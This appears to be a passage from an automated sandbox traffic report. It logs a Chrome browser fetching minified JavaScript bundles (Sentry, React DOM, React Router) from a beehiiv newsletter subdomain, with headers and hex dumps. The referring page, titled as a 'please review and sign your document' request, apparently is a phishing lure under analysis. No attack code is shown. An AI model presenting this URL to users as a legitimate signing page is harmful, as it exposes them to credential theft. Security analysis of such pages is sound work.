                                                                                                                                            2025-01-15 18:14:34 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 64 31 39 33 37 38 30 2d 31 39 32 37 2d 35 38 64 34 2d 39 64 61 61 2d 30 38 65 33 61 65 61 30 35 36 63 38 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ed193780-1927-58d4-9daa-08e3aea056c8")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC150INData Raw: 72 72 6f 72 28 74 29 3a 28 6f 2e 73 75 63 63 65 73 73 28 74 29 2c 65 26 26 65 28 29 29 7d 7d 2c 5b 73 5d 29 7d 3b 65 78 70 6f 72 74 7b 70 20 61 73 20 75 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 75 73 65 54 6f 61 73 74 2d 44 4b 34 32 75 46 30 37 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 65 64 31 39 33 37 38 30 2d 31 39 32 37 2d 35 38 64 34 2d 39 64 61 61 2d 30 38 65 33 61 65 61 30 35 36 63 38 0a
                                                                                                                                            Data Ascii: rror(t):(o.success(t),e&&e())}},[s])};export{p as u};//# sourceMappingURL=useToast-DK42uF07.js.map//# debugId=ed193780-1927-58d4-9daa-08e3aea056c8


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            33192.168.2.1649747104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC550OUTGET /assets/index-x2da_zcv.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC897INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1149
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"47d-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89ef9995e6c-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC472INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 64 39 35 65 64 32 39 33 2d 65 35 66 34 2d 35 39 31 65 2d 39 64 38 37 2d 37 64 61 37 31 31 63 62 36 39 36 63 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d95ed293-e5f4-591e-9d87-7da711cb696c")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC677INData Raw: 66 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 22 22 2c 72 3d 30 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 6e 26 26 28 74 3d 6f 28 74 2c 61 28 6e 29 29 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 20 74 3b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 22 22 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 20 73 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c
                                                                                                                                            Data Ascii: f={}.hasOwnProperty;function s(){for(var t="",r=0;r<arguments.length;r++){var n=arguments[r];n&&(t=o(t,a(n)))}return t}function a(t){if(typeof t=="string"||typeof t=="number")return t;if(typeof t!="object")return"";if(Array.isArray(t))return s.apply(null,


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            34192.168.2.1649748104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC555OUTGET /assets/components-Oj2xMfGE.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC903INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 44165
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"ac85-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89f7b35185d-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC466INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 65 61 34 62 38 32 33 2d 37 64 37 37 2d 35 31 33 33 2d 39 62 33 39 2d 32 38 63 64 32 33 35 61 66 37 37 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="eea4b823-7d77-5133-9b39-28cd235af77e")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 79 20 61 73 20 77 74 2c 45 20 61 73 20 45 74 2c 7a 20 61 73 20 5f 74 2c 42 20 61 73 20 52 74 2c 43 20 61 73 20 55 65 2c 46 20 61 73 20 62 74 2c 47 20 61 73 20 78 74 2c 48 20 61 73 20 54 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 4c 74 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 63 6f 6e 73 74 20 6e 3d 74 5b 72 5d 3b 69 66 28 74 79 70 65 6f 66 20 6e 21 3d 22 73 74 72 69 6e 67 22 26 26 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 29 7b 66 6f 72 28 63 6f 6e 73 74 20 61 20 69 6e 20 6e 29 69 66 28 61 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 21 28 61 20 69 6e 20 65 29 29 7b 63 6f 6e 73 74 20 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f
                                                                                                                                            Data Ascii: y as wt,E as Et,z as _t,B as Rt,C as Ue,F as bt,G as xt,H as Tt}from"./index-D6da9p6-.js";function Lt(e,t){for(var r=0;r<t.length;r++){const n=t[r];if(typeof n!="string"&&!Array.isArray(n)){for(const a in n)if(a!=="default"&&!(a in e)){const i=Object.getO
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 79 70 65 6f 66 3a 50 74 2c 6b 65 79 3a 6e 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 22 22 2b 6e 2c 63 68 69 6c 64 72 65 6e 3a 65 2c 63 6f 6e 74 61 69 6e 65 72 49 6e 66 6f 3a 74 2c 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 3a 72 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 65 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 22 66 6f 6e 74 22 29 72 65 74 75 72 6e 22 22 3b 69 66 28 74 79 70 65 6f 66 20 74 3d 3d 22 73 74 72 69 6e 67 22 29 72 65 74 75 72 6e 20 74 3d 3d 3d 22 75 73 65 2d 63 72 65 64 65 6e 74 69 61 6c 73 22 3f 74 3a 22 22 7d 4f 2e 5f 5f 44 4f 4d 5f 49 4e 54 45 52 4e 41 4c 53 5f 44 4f 5f 4e 4f 54 5f 55 53 45 5f 4f 52 5f 57 41 52 4e 5f 55 53 45 52 53 5f 54 48 45 59 5f 43 41 4e 4e 4f 54 5f 55 50 47 52 41 44 45 3d 43 3b 4f 2e 63 72 65 61 74 65 50 6f 72 74 61 6c 3d 66 75 6e
                                                                                                                                            Data Ascii: ypeof:Pt,key:n==null?null:""+n,children:e,containerInfo:t,implementation:r}}function ne(e,t){if(e==="font")return"";if(typeof t=="string")return t==="use-credentials"?t:""}O.__DOM_INTERNALS_DO_NOT_USE_OR_WARN_USERS_THEY_CANNOT_UPGRADE=C;O.createPortal=fun
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 74 65 67 72 69 74 79 3d 3d 22 73 74 72 69 6e 67 22 3f 74 2e 69 6e 74 65 67 72 69 74 79 3a 76 6f 69 64 20 30 2c 6e 6f 6e 63 65 3a 74 79 70 65 6f 66 20 74 2e 6e 6f 6e 63 65 3d 3d 22 73 74 72 69 6e 67 22 3f 74 2e 6e 6f 6e 63 65 3a 76 6f 69 64 20 30 7d 29 7d 7d 65 6c 73 65 20 74 3d 3d 6e 75 6c 6c 26 26 43 2e 64 2e 4d 28 65 29 7d 3b 4f 2e 70 72 65 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 74 79 70 65 6f 66 20 74 3d 3d 22 6f 62 6a 65 63 74 22 26 26 74 21 3d 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 74 2e 61 73 3d 3d 22 73 74 72 69 6e 67 22 29 7b 76 61 72 20 72 3d 74 2e 61 73 2c 6e 3d 6e 65 28 72 2c 74 2e 63 72 6f 73 73 4f 72 69 67 69 6e 29 3b 43 2e 64 2e 4c 28 65 2c 72 2c 7b 63
                                                                                                                                            Data Ascii: tegrity=="string"?t.integrity:void 0,nonce:typeof t.nonce=="string"?t.nonce:void 0})}}else t==null&&C.d.M(e)};O.preload=function(e,t){if(typeof e=="string"&&typeof t=="object"&&t!==null&&typeof t.as=="string"){var r=t.as,n=ne(r,t.crossOrigin);C.d.L(e,r,{c
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2e 63 68 65 63 6b 44 43 45 28 56 65 29 7d 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 7d 7d 56 65 28 29 2c 48 65 2e 65 78 70 6f 72 74 73 3d 4f 3b 76 61 72 20 4b 65 3d 48 65 2e 65 78 70 6f 72 74 73 3b 63 6f 6e 73 74 20 4f 74 3d 66 74 28 4b 65 29 2c 6b 74 3d 4c 74 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 64 65 66 61 75 6c 74 3a 4f 74 7d 2c 5b 4b 65 5d 29 3b 2f 2a 2a 0a 20 2a 20 52 65 61 63 74 20 52 6f 75 74 65 72 20 44 4f 4d 20 76 36 2e 32 33 2e 31 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 52 65 6d 69 78 20 53 6f 66 74 77 61 72 65 20 49 6e 63 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c
                                                                                                                                            Data Ascii: _DEVTOOLS_GLOBAL_HOOK__.checkDCE(Ve)}catch(e){console.error(e)}}Ve(),He.exports=O;var Ke=He.exports;const Ot=ft(Ke),kt=Lt({__proto__:null,default:Ot},[Ke]);/** * React Router DOM v6.23.1 * * Copyright (c) Remix Software Inc. * * This source code is l
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 6e 2e 6d 61 70 28 61 3d 3e 5b 72 2c 61 5d 29 3a 5b 5b 72 2c 6e 5d 5d 29 7d 2c 5b 5d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 46 74 28 65 2c 74 29 7b 6c 65 74 20 72 3d 6d 65 28 65 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 66 6f 72 45 61 63 68 28 28 6e 2c 61 29 3d 3e 7b 72 2e 68 61 73 28 61 29 7c 7c 74 2e 67 65 74 41 6c 6c 28 61 29 2e 66 6f 72 45 61 63 68 28 69 3d 3e 7b 72 2e 61 70 70 65 6e 64 28 61 2c 69 29 7d 29 7d 29 2c 72 7d 6c 65 74 20 57 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 4d 74 28 29 7b 69 66 28 57 3d 3d 3d 6e 75 6c 6c 29 74 72 79 7b 6e 65 77 20 46 6f 72 6d 44 61 74 61 28 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 6f 72 6d 22 29 2c 30 29 2c 57 3d 21 31 7d 63 61 74 63 68
                                                                                                                                            Data Ascii: ray.isArray(n)?n.map(a=>[r,a]):[[r,n]])},[]))}function Ft(e,t){let r=me(e);return t&&t.forEach((n,a)=>{r.has(a)||t.getAll(a).forEach(i=>{r.append(a,i)})}),r}let W=null;function Mt(){if(W===null)try{new FormData(document.createElement("form"),0),W=!1}catch
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 6e 43 6c 69 63 6b 22 2c 22 72 65 6c 61 74 69 76 65 22 2c 22 72 65 6c 6f 61 64 44 6f 63 75 6d 65 6e 74 22 2c 22 72 65 70 6c 61 63 65 22 2c 22 73 74 61 74 65 22 2c 22 74 61 72 67 65 74 22 2c 22 74 6f 22 2c 22 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 22 2c 22 75 6e 73 74 61 62 6c 65 5f 76 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 22 5d 2c 4a 74 3d 5b 22 61 72 69 61 2d 63 75 72 72 65 6e 74 22 2c 22 63 61 73 65 53 65 6e 73 69 74 69 76 65 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 2c 22 65 6e 64 22 2c 22 73 74 79 6c 65 22 2c 22 74 6f 22 2c 22 75 6e 73 74 61 62 6c 65 5f 76 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 63 68 69 6c 64 72 65 6e 22 5d 2c 56 74 3d 5b 22 66 65 74 63 68 65 72 4b 65 79 22 2c 22 6e 61 76 69 67 61 74 65 22 2c 22 72 65 6c 6f 61 64
                                                                                                                                            Data Ascii: nClick","relative","reloadDocument","replace","state","target","to","preventScrollReset","unstable_viewTransition"],Jt=["aria-current","caseSensitive","className","end","style","to","unstable_viewTransition","children"],Vt=["fetcherKey","navigate","reload
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 6c 7c 7c 72 2e 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3d 3d 6e 75 6c 6c 7c 7c 74 79 70 65 6f 66 20 72 2e 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 73 74 61 72 74 56 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 21 3d 22 66 75 6e 63 74 69 6f 6e 22 3b 69 66 28 21 50 7c 7c 44 29 7b 78 3f 56 28 28 29 3d 3e 69 28 79 29 29 3a 76 28 28 29 3d 3e 69 28 79 29 29 3b 72 65 74 75 72 6e 7d 69 66 28 78 29 7b 56 28 28 29 3d 3e 7b 6d 26 26 28 66 26 26 66 2e 72 65 73 6f 6c 76 65 28 29 2c 6d 2e 73 6b 69 70 54 72 61 6e 73 69 74 69 6f 6e 28 29 29 2c 63 28 7b 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3a 21 30 2c 66 6c 75 73 68 53 79 6e 63 3a 21 30 2c 63 75 72 72 65 6e 74 4c 6f 63 61 74 69 6f 6e 3a 50 2e 63 75 72 72 65 6e 74 4c 6f 63 61 74 69 6f 6e 2c 6e 65 78 74 4c 6f
                                                                                                                                            Data Ascii: l||r.window.document==null||typeof r.window.document.startViewTransition!="function";if(!P||D){x?V(()=>i(y)):v(()=>i(y));return}if(x){V(()=>{m&&(f&&f.resolve(),m.skipTransition()),c({isTransitioning:!0,flushSync:!0,currentLocation:P.currentLocation,nextLo
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 72 65 61 74 65 48 72 65 66 2c 65 6e 63 6f 64 65 4c 6f 63 61 74 69 6f 6e 3a 72 2e 65 6e 63 6f 64 65 4c 6f 63 61 74 69 6f 6e 2c 67 6f 3a 79 3d 3e 72 2e 6e 61 76 69 67 61 74 65 28 79 29 2c 70 75 73 68 3a 28 79 2c 45 2c 5f 29 3d 3e 72 2e 6e 61 76 69 67 61 74 65 28 79 2c 7b 73 74 61 74 65 3a 45 2c 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 3a 5f 3f 2e 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 7d 29 2c 72 65 70 6c 61 63 65 3a 28 79 2c 45 2c 5f 29 3d 3e 72 2e 6e 61 76 69 67 61 74 65 28 79 2c 7b 72 65 70 6c 61 63 65 3a 21 30 2c 73 74 61 74 65 3a 45 2c 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 3a 5f 3f 2e 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 7d 29 7d 29 2c 5b 72 5d 29 2c 4e 3d 72 2e 62 61 73 65 6e 61 6d 65 7c 7c
                                                                                                                                            Data Ascii: reateHref,encodeLocation:r.encodeLocation,go:y=>r.navigate(y),push:(y,E,_)=>r.navigate(y,{state:E,preventScrollReset:_?.preventScrollReset}),replace:(y,E,_)=>r.navigate(y,{replace:!0,state:E,preventScrollReset:_?.preventScrollReset})}),[r]),N=r.basename||
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 67 69 6e 3d 3d 3d 77 2e 6f 72 69 67 69 6e 26 26 4e 21 3d 6e 75 6c 6c 3f 63 3d 4e 2b 62 2e 73 65 61 72 63 68 2b 62 2e 68 61 73 68 3a 67 3d 21 30 7d 63 61 74 63 68 7b 7d 6c 65 74 20 53 3d 76 65 28 63 2c 7b 72 65 6c 61 74 69 76 65 3a 61 7d 29 2c 52 3d 74 72 28 63 2c 7b 72 65 70 6c 61 63 65 3a 6c 2c 73 74 61 74 65 3a 6f 2c 74 61 72 67 65 74 3a 75 2c 70 72 65 76 65 6e 74 53 63 72 6f 6c 6c 52 65 73 65 74 3a 66 2c 72 65 6c 61 74 69 76 65 3a 61 2c 75 6e 73 74 61 62 6c 65 5f 76 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 3a 64 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 76 28 77 29 7b 6e 26 26 6e 28 77 29 2c 77 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 7c 7c 52 28 77 29 7d 72 65 74 75 72 6e 20 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 2c 41 28 7b 7d 2c
                                                                                                                                            Data Ascii: gin===w.origin&&N!=null?c=N+b.search+b.hash:g=!0}catch{}let S=ve(c,{relative:a}),R=tr(c,{replace:l,state:o,target:u,preventScrollReset:f,relative:a,unstable_viewTransition:d});function v(w){n&&n(w),w.defaultPrevented||R(w)}return s.createElement("a",A({},


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            35192.168.2.1649749104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC850OUTGET /assets/WebThemeContext-DttfuZxo.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 3697
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"e71-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4161
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a05a9dde9a-EWR
